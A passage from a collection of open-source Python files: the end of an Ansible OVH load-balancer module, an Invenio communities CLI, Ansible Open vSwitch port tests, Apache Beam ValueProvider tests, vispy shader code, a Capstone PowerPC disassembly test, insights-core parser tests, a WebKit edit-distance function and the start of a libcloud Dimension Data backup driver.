'backend, check application key, secret, consumerkey '
'and parameters. Error returned by OVH api was : {0}'
.format(apiError))
moduleChanged = True
if (backendProperties['probe'] != probe):
# Change probe
backendProperties['probe'] = probe
try:
client.put(
'/ip/loadBalancing/{0}/backend/{1}'
.format(name, backend), probe=probe)
if not waitForNoTask(client, name, timeout):
module.fail_json(
msg='Timeout of {0} seconds while waiting for completion of '
'setProbe to backend task'
.format(timeout))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for updating the probe of '
'the backend, check application key, secret, '
'consumerkey and parameters. Error returned by OVH api '
'was : {0}'
.format(apiError))
moduleChanged = True
else:
# Creates backend
try:
try:
client.post('/ip/loadBalancing/{0}/backend'.format(name),
ipBackend=backend, probe=probe, weight=weight)
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for creating the backend, check '
'application key, secret, consumerkey and parameters. '
'Error returned by OVH api was : {0}'
.format(apiError))
if not waitForNoTask(client, name, timeout):
module.fail_json(
msg='Timeout of {0} seconds while waiting for completion of '
'backend creation task'.format(timeout))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for creating the backend, check '
'application key, secret, consumerkey and parameters. '
'Error returned by OVH api was : {0}'.format(apiError))
moduleChanged = True
module.exit_json(changed=moduleChanged)
if __name__ == '__main__':
main()
|
tind/invenio-communities | refs/heads/master | invenio_communities/cli.py | 1 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Click command-line interface for communities management."""
from __future__ import absolute_import, print_function
import click
from flask_cli import with_appcontext
from invenio_db import db
from invenio_files_rest.errors import FilesException
from invenio_indexer.api import RecordIndexer
from invenio_records.api import Record
from .models import Community, InclusionRequest
from .utils import initialize_communities_bucket, save_and_validate_logo
#
# Communities management commands
#
@click.group()
def communities():
"""Management commands for Communities."""
@communities.command()
@with_appcontext
def init():
"""Initialize the communities file storage."""
try:
initialize_communities_bucket()
click.secho('Community init successful.', fg='green')
except FilesException as e:
click.secho(e.message, fg='red')
@communities.command()
@click.argument('community_id')
@click.argument('logo', type=click.File('rb'))
@with_appcontext
def addlogo(community_id, logo):
"""Add logo to the community."""
# Create the bucket
c = Community.get(community_id)
if not c:
click.secho('Community {0} does not exist.'.format(community_id),
fg='red')
return
ext = save_and_validate_logo(logo, logo.name, c.id)
c.logo_ext = ext
db.session.commit()
@communities.command()
@click.argument('community_id')
@click.argument('record_id')
@click.option('-a', '--accept', 'accept', is_flag=True, default=False)
@with_appcontext
def request(community_id, record_id, accept):
"""Request a record acceptance to a community."""
c = Community.get(community_id)
assert c is not None
record = Record.get_record(record_id)
if accept:
c.add_record(record)
record.commit()
else:
InclusionRequest.create(community=c, record=record,
notify=False)
db.session.commit()
RecordIndexer().index_by_id(record.id)
@communities.command()
@click.argument('community_id')
@click.argument('record_id')
@with_appcontext
def remove(community_id, record_id):
"""Remove a record from community."""
c = Community.get(community_id)
assert c is not None
c.remove_record(record_id)
db.session.commit()
RecordIndexer().index_by_id(record_id)
|
drmrd/ansible | refs/heads/devel | test/units/modules/network/ovs/test_openvswitch_port.py | 57 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.compat.tests.mock import patch
from ansible.modules.network.ovs import openvswitch_port
from units.modules.utils import set_module_args
from .ovs_module import TestOpenVSwitchModule, load_fixture
test_name_side_effect_matrix = {
'test_openvswitch_port_absent_idempotent': [
(0, '', '')],
'test_openvswitch_port_absent_removes_port': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_idempotent': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_creates_port': [
(0, '', ''),
(0, '', ''),
(0, '', '')],
'test_openvswitch_port_present_changes_tag': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_changes_external_id': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_adds_external_id': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_clears_external_id': [
(0, 'list_ports_test_br.cfg', ''),
(0, 'get_port_eth2_tag.cfg', ''),
(0, 'get_port_eth2_external_ids.cfg', ''),
(0, '', '')],
'test_openvswitch_port_present_runs_set_mode': [
(0, '', ''),
(0, '', ''),
(0, '', '')],
}
class TestOpenVSwitchPortModule(TestOpenVSwitchModule):
module = openvswitch_port
def setUp(self):
super(TestOpenVSwitchPortModule, self).setUp()
self.mock_run_command = (
patch('ansible.module_utils.basic.AnsibleModule.run_command'))
self.run_command = self.mock_run_command.start()
self.mock_get_bin_path = (
patch('ansible.module_utils.basic.AnsibleModule.get_bin_path'))
self.get_bin_path = self.mock_get_bin_path.start()
def tearDown(self):
super(TestOpenVSwitchPortModule, self).tearDown()
self.mock_run_command.stop()
self.mock_get_bin_path.stop()
def load_fixtures(self, test_name):
test_side_effects = []
for s in test_name_side_effect_matrix[test_name]:
rc = s[0]
out = s[1] if s[1] == '' else str(load_fixture(s[1]))
err = s[2]
side_effect_with_fixture_loaded = (rc, out, err)
test_side_effects.append(side_effect_with_fixture_loaded)
self.run_command.side_effect = test_side_effects
self.get_bin_path.return_value = '/usr/bin/ovs-vsctl'
def test_openvswitch_port_absent_idempotent(self):
set_module_args(dict(state='absent',
bridge='test-br',
port='eth2'))
self.execute_module(test_name='test_openvswitch_port_absent_idempotent')
def test_openvswitch_port_absent_removes_port(self):
set_module_args(dict(state='absent',
bridge='test-br',
port='eth2'))
commands = [
'/usr/bin/ovs-vsctl -t 5 del-port test-br eth2',
]
self.execute_module(changed=True, commands=commands,
test_name='test_openvswitch_port_absent_removes_port')
def test_openvswitch_port_present_idempotent(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo': 'bar'}))
self.execute_module(test_name='test_openvswitch_port_present_idempotent')
def test_openvswitch_port_present_creates_port(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo': 'bar'}))
commands = [
'/usr/bin/ovs-vsctl -t 5 add-port test-br eth2 tag=10',
'/usr/bin/ovs-vsctl -t 5 set port eth2 external_ids:foo=bar'
]
self.execute_module(changed=True,
commands=commands,
test_name='test_openvswitch_port_present_creates_port')
def test_openvswitch_port_present_changes_tag(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=20,
external_ids={'foo': 'bar'}))
commands = [
'/usr/bin/ovs-vsctl -t 5 set port eth2 tag=20'
]
self.execute_module(changed=True,
commands=commands,
test_name='test_openvswitch_port_present_changes_tag')
def test_openvswitch_port_present_changes_external_id(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo': 'baz'}))
commands = [
'/usr/bin/ovs-vsctl -t 5 set port eth2 external_ids:foo=baz'
]
self.execute_module(changed=True,
commands=commands,
test_name='test_openvswitch_port_present_changes_external_id')
def test_openvswitch_port_present_adds_external_id(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo2': 'bar2'}))
commands = [
'/usr/bin/ovs-vsctl -t 5 set port eth2 external_ids:foo2=bar2'
]
self.execute_module(changed=True,
commands=commands,
test_name='test_openvswitch_port_present_adds_external_id')
def test_openvswitch_port_present_clears_external_id(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo': None}))
commands = [
'/usr/bin/ovs-vsctl -t 5 remove port eth2 external_ids foo'
]
self.execute_module(changed=True,
commands=commands,
test_name='test_openvswitch_port_present_clears_external_id')
def test_openvswitch_port_present_runs_set_mode(self):
set_module_args(dict(state='present',
bridge='test-br',
port='eth2',
tag=10,
external_ids={'foo': 'bar'},
set="port eth2 other_config:stp-path-cost=10"))
commands = [
'/usr/bin/ovs-vsctl -t 5 add-port test-br eth2 tag=10 -- set'
' port eth2 other_config:stp-path-cost=10',
'/usr/bin/ovs-vsctl -t 5 set port eth2 external_ids:foo=bar'
]
self.execute_module(changed=True, commands=commands,
test_name='test_openvswitch_port_present_runs_set_mode')
|
vikkyrk/incubator-beam | refs/heads/master | sdks/python/apache_beam/utils/value_provider_test.py | 2 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for the ValueProvider class."""
import unittest
from apache_beam.utils.pipeline_options import PipelineOptions
from apache_beam.utils.value_provider import RuntimeValueProvider
from apache_beam.utils.value_provider import StaticValueProvider
class ValueProviderTests(unittest.TestCase):
def test_static_value_provider_keyword_argument(self):
class UserDefinedOptions(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'--vp_arg',
help='This keyword argument is a value provider',
default='some value')
options = UserDefinedOptions(['--vp_arg', 'abc'])
self.assertTrue(isinstance(options.vp_arg, StaticValueProvider))
self.assertTrue(options.vp_arg.is_accessible())
self.assertEqual(options.vp_arg.get(), 'abc')
def test_runtime_value_provider_keyword_argument(self):
class UserDefinedOptions(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'--vp_arg',
help='This keyword argument is a value provider')
options = UserDefinedOptions()
self.assertTrue(isinstance(options.vp_arg, RuntimeValueProvider))
self.assertFalse(options.vp_arg.is_accessible())
with self.assertRaises(RuntimeError):
options.vp_arg.get()
def test_static_value_provider_positional_argument(self):
class UserDefinedOptions(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'vp_pos_arg',
help='This positional argument is a value provider',
default='some value')
options = UserDefinedOptions(['abc'])
self.assertTrue(isinstance(options.vp_pos_arg, StaticValueProvider))
self.assertTrue(options.vp_pos_arg.is_accessible())
self.assertEqual(options.vp_pos_arg.get(), 'abc')
def test_runtime_value_provider_positional_argument(self):
class UserDefinedOptions(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'vp_pos_arg',
help='This positional argument is a value provider')
options = UserDefinedOptions([])
self.assertTrue(isinstance(options.vp_pos_arg, RuntimeValueProvider))
self.assertFalse(options.vp_pos_arg.is_accessible())
with self.assertRaises(RuntimeError):
options.vp_pos_arg.get()
def test_static_value_provider_type_cast(self):
class UserDefinedOptions(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'--vp_arg',
type=int,
help='This flag is a value provider')
options = UserDefinedOptions(['--vp_arg', '123'])
self.assertTrue(isinstance(options.vp_arg, StaticValueProvider))
self.assertTrue(options.vp_arg.is_accessible())
self.assertEqual(options.vp_arg.get(), 123)
def test_set_runtime_option(self):
# define ValueProvider options, with and without default values
class UserDefinedOptions1(PipelineOptions):
@classmethod
def _add_argparse_args(cls, parser):
parser.add_value_provider_argument(
'--vp_arg',
help='This keyword argument is a value provider') # set at runtime
parser.add_value_provider_argument( # not set, had default int
'-v', '--vp_arg2', # with short form
default=123,
type=int)
parser.add_value_provider_argument( # not set, had default str
'--vp-arg3', # with dash in name
default='123',
type=str)
parser.add_value_provider_argument( # not set and no default
'--vp_arg4',
type=float)
parser.add_value_provider_argument( # positional argument set
'vp_pos_arg', # default & runtime ignored
help='This positional argument is a value provider',
type=float,
default=5.4)
# provide values at graph-construction time
# (options not provided here become of the type RuntimeValueProvider)
options = UserDefinedOptions1(['1.2'])
self.assertFalse(options.vp_arg.is_accessible())
self.assertFalse(options.vp_arg2.is_accessible())
self.assertFalse(options.vp_arg3.is_accessible())
self.assertFalse(options.vp_arg4.is_accessible())
self.assertTrue(options.vp_pos_arg.is_accessible())
# provide values at job-execution time
# (options not provided here will use their default, if they have one)
RuntimeValueProvider.set_runtime_options({'vp_arg': 'abc',
'vp_pos_arg': '3.2'})
self.assertTrue(options.vp_arg.is_accessible())
self.assertEqual(options.vp_arg.get(), 'abc')
self.assertTrue(options.vp_arg2.is_accessible())
self.assertEqual(options.vp_arg2.get(), 123)
self.assertTrue(options.vp_arg3.is_accessible())
self.assertEqual(options.vp_arg3.get(), '123')
self.assertTrue(options.vp_arg4.is_accessible())
self.assertIsNone(options.vp_arg4.get())
self.assertTrue(options.vp_pos_arg.is_accessible())
self.assertEqual(options.vp_pos_arg.get(), 1.2)
|
sh4wn/vispy | refs/heads/master | vispy/visuals/shaders/program.py | 20 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
from __future__ import division
import logging
from ...gloo import Program
from ...gloo.preprocessor import preprocess
from ...util import logger
from ...util.event import EventEmitter
from .function import MainFunction
from .variable import Variable
from .compiler import Compiler
class ModularProgram(Program):
"""
Shader program using Function instances as basis for its shaders.
Automatically rebuilds program when functions have changed and uploads
program variables.
"""
def __init__(self, vcode='', fcode=''):
Program.__init__(self)
self.changed = EventEmitter(source=self, type='program_change')
# Cache state of Variables so we know which ones require update
self._variable_state = {}
self._vert = MainFunction('')
self._frag = MainFunction('')
self._vert._dependents[self] = None
self._frag._dependents[self] = None
self.vert = vcode
self.frag = fcode
@property
def vert(self):
return self._vert
@vert.setter
def vert(self, vcode):
vcode = preprocess(vcode)
self._vert.code = vcode
self._need_build = True
self.changed(code_changed=True, value_changed=False)
@property
def frag(self):
return self._frag
@frag.setter
def frag(self, fcode):
fcode = preprocess(fcode)
self._frag.code = fcode
self._need_build = True
self.changed(code_changed=True, value_changed=False)
def _dep_changed(self, dep, code_changed=False, value_changed=False):
if code_changed and logger.level <= logging.DEBUG:
import traceback
logger.debug("ModularProgram changed: %s source=%s, values=%s",
self, code_changed, value_changed)
traceback.print_stack()
if code_changed:
self._need_build = True
self.changed(code_changed=code_changed,
value_changed=value_changed)
def draw(self, *args, **kwargs):
self.build_if_needed()
Program.draw(self, *args, **kwargs)
def build_if_needed(self):
""" Reset shader source if necesssary.
"""
if self._need_build:
self._build()
self._need_build = False
self.update_variables()
def _build(self):
logger.debug("Rebuild ModularProgram: %s", self)
self.compiler = Compiler(vert=self.vert, frag=self.frag)
code = self.compiler.compile()
self.set_shaders(code['vert'], code['frag'])
logger.debug('==== Vertex Shader ====\n\n%s\n', code['vert'])
logger.debug('==== Fragment shader ====\n\n%s\n', code['frag'])
# Note: No need to reset _variable_state, gloo.Program resends
# attribute/uniform data on setting shaders
def update_variables(self):
# Clear any variables that we may have set another time.
# Otherwise we get lots of warnings.
self._pending_variables = {}
# set all variables
settable_vars = 'attribute', 'uniform'
logger.debug("Apply variables:")
deps = self.vert.dependencies() + self.frag.dependencies()
for dep in deps:
if not isinstance(dep, Variable) or dep.vtype not in settable_vars:
continue
name = self.compiler[dep]
state_id = dep.state_id
if self._variable_state.get(name, None) != state_id:
self[name] = dep.value
self._variable_state[name] = state_id
logger.debug(" %s = %s **", name, dep.value)
else:
logger.debug(" %s = %s", name, dep.value)
|
ericzolf/ansible | refs/heads/devel | test/integration/targets/delegate_to/library/detect_interpreter.py | 40 | #!/usr/bin/python
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import sys
from ansible.module_utils.basic import AnsibleModule
def main():
module = AnsibleModule(argument_spec={})
module.exit_json(**dict(found=sys.executable))
if __name__ == '__main__':
main()
|
capturePointer/capstone | refs/heads/master | bindings/python/test_ppc.py | 33 | #!/usr/bin/env python
# Capstone Python bindings, by Nguyen Anh Quynh <aquynh@gmail.com>
from __future__ import print_function
from capstone import *
from capstone.ppc import *
from xprint import to_x, to_hex, to_x_32
PPC_CODE = b"\x43\x20\x0c\x07\x41\x56\xff\x17\x80\x20\x00\x00\x80\x3f\x00\x00\x10\x43\x23\x0e\xd0\x44\x00\x80\x4c\x43\x22\x02\x2d\x03\x00\x80\x7c\x43\x20\x14\x7c\x43\x20\x93\x4f\x20\x00\x21\x4c\xc8\x00\x21\x40\x82\x00\x14"
all_tests = (
(CS_ARCH_PPC, CS_MODE_BIG_ENDIAN, PPC_CODE, "PPC-64"),
)
def print_insn_detail(insn):
# print address, mnemonic and operands
print("0x%x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))
# "data" instruction generated by SKIPDATA option has no detail
if insn.id == 0:
return
if len(insn.operands) > 0:
print("\top_count: %u" % len(insn.operands))
c = 0
for i in insn.operands:
if i.type == PPC_OP_REG:
print("\t\toperands[%u].type: REG = %s" % (c, insn.reg_name(i.reg)))
if i.type == PPC_OP_IMM:
print("\t\toperands[%u].type: IMM = 0x%s" % (c, to_x_32(i.imm)))
if i.type == PPC_OP_MEM:
print("\t\toperands[%u].type: MEM" % c)
if i.mem.base != 0:
print("\t\t\toperands[%u].mem.base: REG = %s" \
% (c, insn.reg_name(i.mem.base)))
if i.mem.disp != 0:
print("\t\t\toperands[%u].mem.disp: 0x%s" \
% (c, to_x_32(i.mem.disp)))
if i.type == PPC_OP_CRX:
print("\t\toperands[%u].type: CRX" % c)
print("\t\t\toperands[%u].crx.scale: = %u" \
% (c, i.crx.scale))
if i.crx.reg != 0:
print("\t\t\toperands[%u].crx.reg: REG = %s" \
% (c, insn.reg_name(i.crx.reg)))
if i.crx.cond != 0:
print("\t\t\toperands[%u].crx.cond: 0x%x" \
% (c, i.crx.cond))
c += 1
if insn.bc:
print("\tBranch code: %u" % insn.bc)
if insn.bh:
print("\tBranch hint: %u" % insn.bh)
if insn.update_cr0:
print("\tUpdate-CR0: True")
# ## Test class Cs
def test_class():
for (arch, mode, code, comment) in all_tests:
print("*" * 16)
print("Platform: %s" % comment)
print("Code: %s" % to_hex(code))
print("Disasm:")
try:
md = Cs(arch, mode)
md.detail = True
for insn in md.disasm(code, 0x1000):
print_insn_detail(insn)
print()
print("0x%x:\n" % (insn.address + insn.size))
except CsError as e:
print("ERROR: %s" % e)
if __name__ == '__main__':
test_class()
|
RedHatInsights/insights-core | refs/heads/master | insights/parsers/tests/test_sendq_recvq_socket_buffer.py | 1 | import doctest
import pytest
from insights.parsers import ParseException
from insights.tests import context_wrap
from insights.parsers import sendq_recvq_socket_buffer
from insights.parsers.sendq_recvq_socket_buffer import SendQSocketBuffer, RecvQSocketBuffer
SENDQ_SOCKET_BUFFER = """
4096 16384 4194304
""".strip()
EMPTY_SENDQ_SOCKET_BUFFER = """
""".strip()
RECVQ_SOCKET_BUFFER = """
4096 87380 6291456
""".strip()
EMPTY_RECVQ_SOCKET_BUFFER = """
""".strip()
def test_empty_sendq_socket_buffer():
with pytest.raises(ParseException) as exc:
SendQSocketBuffer(context_wrap(EMPTY_SENDQ_SOCKET_BUFFER))
assert str(exc.value) == "Empty content"
def test_sendq_socket_buffer():
sendq_buffer = SendQSocketBuffer(context_wrap(SENDQ_SOCKET_BUFFER))
assert sendq_buffer.minimum == 4096
assert sendq_buffer.default == 16384
assert sendq_buffer.maximum == 4194304
assert sendq_buffer.raw == '4096 16384 4194304'
def test_empty_recvq_socket_buffer():
with pytest.raises(ParseException) as exc:
RecvQSocketBuffer(context_wrap(EMPTY_RECVQ_SOCKET_BUFFER))
assert str(exc.value) == "Empty content"
def test_recvq_socket_buffer():
recvq_buffer = RecvQSocketBuffer(context_wrap(RECVQ_SOCKET_BUFFER))
assert recvq_buffer.minimum == 4096
assert recvq_buffer.default == 87380
assert recvq_buffer.maximum == 6291456
assert recvq_buffer.raw == '4096 87380 6291456'
def test_doc():
env = {
'sendq_buffer_values': SendQSocketBuffer(context_wrap(SENDQ_SOCKET_BUFFER)),
'recvq_buffer_values': RecvQSocketBuffer(context_wrap(RECVQ_SOCKET_BUFFER)),
}
failures, tests = doctest.testmod(sendq_recvq_socket_buffer, globs=env)
assert failures == 0
|
aljscott/phantomjs | refs/heads/master | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/editdistance.py | 138 | # Copyright (c) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from array import array
def edit_distance(str1, str2):
unsignedShort = 'H'  # array typecode for unsigned short ('h' is signed)
distances = [array(unsignedShort, (0,) * (len(str2) + 1)) for i in range(0, len(str1) + 1)]
# distances[0][0] = 0 since distance between str1[:0] and str2[:0] is 0
for i in range(1, len(str1) + 1):
distances[i][0] = i # Distance between str1[:i] and str2[:0] is i
for j in range(1, len(str2) + 1):
distances[0][j] = j # Distance between str1[:0] and str2[:j] is j
for i in range(0, len(str1)):
for j in range(0, len(str2)):
diff = 0 if str1[i] == str2[j] else 1
# Deletion, Insertion, Identical / Replacement
distances[i + 1][j + 1] = min(distances[i + 1][j] + 1, distances[i][j + 1] + 1, distances[i][j] + diff)
return distances[len(str1)][len(str2)]
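The dynamic-programming recurrence above can be exercised standalone. The following self-contained sketch (the `'H'` unsigned-short typecode is an assumption matching the variable name, not part of the original file) mirrors the same table-filling scheme and checks it against a classic example.

```python
from array import array


def edit_distance(str1, str2):
    # 'H' is the array typecode for an unsigned short.
    unsigned_short = 'H'
    # distances[i][j] holds the edit distance between str1[:i] and str2[:j].
    distances = [array(unsigned_short, (0,) * (len(str2) + 1))
                 for _ in range(len(str1) + 1)]
    for i in range(1, len(str1) + 1):
        distances[i][0] = i  # deleting i characters
    for j in range(1, len(str2) + 1):
        distances[0][j] = j  # inserting j characters
    for i in range(len(str1)):
        for j in range(len(str2)):
            diff = 0 if str1[i] == str2[j] else 1
            # insertion, deletion, identical / replacement
            distances[i + 1][j + 1] = min(distances[i + 1][j] + 1,
                                          distances[i][j + 1] + 1,
                                          distances[i][j] + diff)
    return distances[len(str1)][len(str2)]


print(edit_distance("kitten", "sitting"))  # 3
```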
|
erjohnso/libcloud | refs/heads/trunk | libcloud/backup/drivers/dimensiondata.py | 13 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from libcloud.utils.py3 import ET
from libcloud.backup.base import BackupDriver, BackupTarget, BackupTargetJob
from libcloud.backup.types import BackupTargetType
from libcloud.backup.types import Provider
from libcloud.common.dimensiondata import dd_object_to_id
from libcloud.common.dimensiondata import DimensionDataConnection
from libcloud.common.dimensiondata import DimensionDataBackupClient
from libcloud.common.dimensiondata import DimensionDataBackupClientAlert
from libcloud.common.dimensiondata import DimensionDataBackupClientType
from libcloud.common.dimensiondata import DimensionDataBackupDetails
from libcloud.common.dimensiondata import DimensionDataBackupSchedulePolicy
from libcloud.common.dimensiondata import DimensionDataBackupStoragePolicy
from libcloud.common.dimensiondata import API_ENDPOINTS, DEFAULT_REGION
from libcloud.common.dimensiondata import TYPES_URN
from libcloud.common.dimensiondata import GENERAL_NS, BACKUP_NS
from libcloud.utils.xml import fixxpath, findtext, findall
# pylint: disable=no-member
DEFAULT_BACKUP_PLAN = 'Advanced'
class DimensionDataBackupDriver(BackupDriver):
"""
DimensionData backup driver.
"""
selected_region = None
connectionCls = DimensionDataConnection
name = 'Dimension Data Backup'
website = 'https://cloud.dimensiondata.com/'
type = Provider.DIMENSIONDATA
api_version = 1.0
network_domain_id = None
def __init__(self, key, secret=None, secure=True, host=None, port=None,
api_version=None, region=DEFAULT_REGION, **kwargs):
if region not in API_ENDPOINTS and host is None:
raise ValueError(
'Invalid region: %s, no host specified' % (region))
if region is not None:
self.selected_region = API_ENDPOINTS[region]
super(DimensionDataBackupDriver, self).__init__(
key=key, secret=secret,
secure=secure, host=host,
port=port,
api_version=api_version,
region=region,
**kwargs)
def _ex_connection_class_kwargs(self):
"""
Add the region to the kwargs before the connection is instantiated
"""
kwargs = super(DimensionDataBackupDriver,
self)._ex_connection_class_kwargs()
kwargs['region'] = self.selected_region
return kwargs
def get_supported_target_types(self):
"""
Get a list of backup target types this driver supports
:return: ``list`` of :class:``BackupTargetType``
"""
return [BackupTargetType.VIRTUAL]
def list_targets(self):
"""
List all backup targets
:rtype: ``list`` of :class:`BackupTarget`
"""
targets = self._to_targets(
self.connection.request_with_orgId_api_2('server/server').object)
return targets
def create_target(self, name, address,
type=BackupTargetType.VIRTUAL, extra=None):
"""
Creates a new backup target
:param name: Name of the target (not used)
:type name: ``str``
:param address: The ID of the node in Dimension Data Cloud
:type address: ``str``
:param type: Backup target type, only Virtual supported
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
if extra is not None:
service_plan = extra.get('servicePlan', DEFAULT_BACKUP_PLAN)
else:
service_plan = DEFAULT_BACKUP_PLAN
extra = {'servicePlan': service_plan}
create_node = ET.Element('NewBackup',
{'xmlns': BACKUP_NS})
create_node.set('servicePlan', service_plan)
response = self.connection.request_with_orgId_api_1(
'server/%s/backup' % (address),
method='POST',
data=ET.tostring(create_node)).object
asset_id = None
for info in findall(response,
'additionalInformation',
GENERAL_NS):
if info.get('name') == 'assetId':
asset_id = findtext(info, 'value', GENERAL_NS)
return BackupTarget(
id=asset_id,
name=name,
address=address,
type=type,
extra=extra,
driver=self
)
def create_target_from_node(self, node, type=BackupTargetType.VIRTUAL,
extra=None):
"""
Creates a new backup target from an existing node
:param node: The Node to backup
:type node: ``Node``
:param type: Backup target type (Physical, Virtual, ...).
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
return self.create_target(name=node.name,
address=node.id,
type=BackupTargetType.VIRTUAL,
extra=extra)
def create_target_from_container(self, container,
type=BackupTargetType.OBJECT,
extra=None):
"""
Creates a new backup target from an existing storage container
:param container: The Container to backup
:type container: ``Container``
:param type: Backup target type (Physical, Virtual, ...).
:type type: :class:`BackupTargetType`
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: Instance of :class:`BackupTarget`
"""
raise NotImplementedError(
'create_target_from_container not supported for this driver')
def update_target(self, target, name=None, address=None, extra=None):
"""
Update the properties of a backup target, only changing the serviceplan
is supported.
:param target: Backup target to update
:type target: Instance of :class:`BackupTarget` or ``str``
:param name: Name of the target
:type name: ``str``
:param address: Hostname, FQDN, IP, file path etc.
:type address: ``str``
